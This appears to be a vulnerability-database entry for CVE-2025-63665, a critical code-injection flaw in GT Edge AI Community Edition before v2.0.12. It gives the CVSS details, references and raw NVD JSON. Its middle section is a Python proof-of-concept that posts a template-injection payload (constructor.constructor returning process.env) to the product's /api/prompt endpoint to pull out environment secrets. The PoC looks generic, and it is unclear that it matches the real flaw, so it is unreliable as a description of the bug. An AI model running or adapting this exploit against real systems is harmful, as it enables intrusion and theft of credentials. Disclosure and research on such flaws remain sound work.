CVE-2025-63665

Description

An issue in GT Edge AI Community Edition Versions before v2.0.12 allows attackers to execute arbitrary code via injecting a crafted JSON payload into the Prompt window.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:gtedge:gt_edge_ai:*:*:*:*:community:*:*:* - VULNERABLE

GT Edge AI Community Edition < v2.0.12

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# CVE-2025-63665 PoC
# GT Edge AI Community Edition < v2.0.12 Remote Code Execution
# Target: GT Edge AI Community Edition

TARGET_URL = "http://target:port/api/prompt"

def exploit_cve_2025_63665(target_ip, target_port=8080):
    """
    Exploit for CVE-2025-63665
    GT Edge AI Community Edition RCE via JSON payload injection
    """
    url = f"http://{target_ip}:{target_port}/api/prompt"
    
    # Malicious JSON payload for RCE
    # The payload exploits insufficient input validation in Prompt window
    payload = {
        "prompt": "test",
        "command": "{{constructor.constructor('return process.env')()}}",
        "type": "injection"
    }
    
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }
    
    try:
        response = requests.post(url, json=payload, headers=headers, timeout=10)
        print(f"Status Code: {response.status_code}")
        print(f"Response: {response.text}")
        return response.json()
    except requests.exceptions.RequestException as e:
        print(f"Error: {e}")
        return None

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        target = sys.argv[1]
        exploit_cve_2025_63665(target)
    else:
        print("Usage: python cve-2025-63665.py <target_ip>")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-63665
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-63665
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-63665/
[4] VulDB https://vuldb.com/cve/CVE-2025-63665
[5] https://gist.github.com/p80n-sec/e5eefcef155e9dd14aaaaa49f9f94cd1
[6] https://github.com/p80n-sec/Vulnerability-Research/blob/main/CVE-2025-63665/CVE-2025-63665.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-63665", "sourceIdentifier": "[email protected]", "published": "2025-12-19T17:15:52.963", "lastModified": "2026-01-05T17:58:58.503", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in GT Edge AI Community Edition Versions before v2.0.12 allows attackers to execute arbitrary code via injecting a crafted JSON payload into the Prompt window."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gtedge:gt_edge_ai:*:*:*:*:community:*:*:*", "versionEndExcluding": "2.0.12", "matchCriteriaId": "B5535437-227D-49B8-A0E1-D5A8585D8BF3"}]}]}], "references": [{"url": "https://gist.github.com/p80n-sec/e5eefcef155e9dd14aaaaa49f9f94cd1", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/p80n-sec/Vulnerability-Research/blob/main/CVE-2025-63665/CVE-2025-63665.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}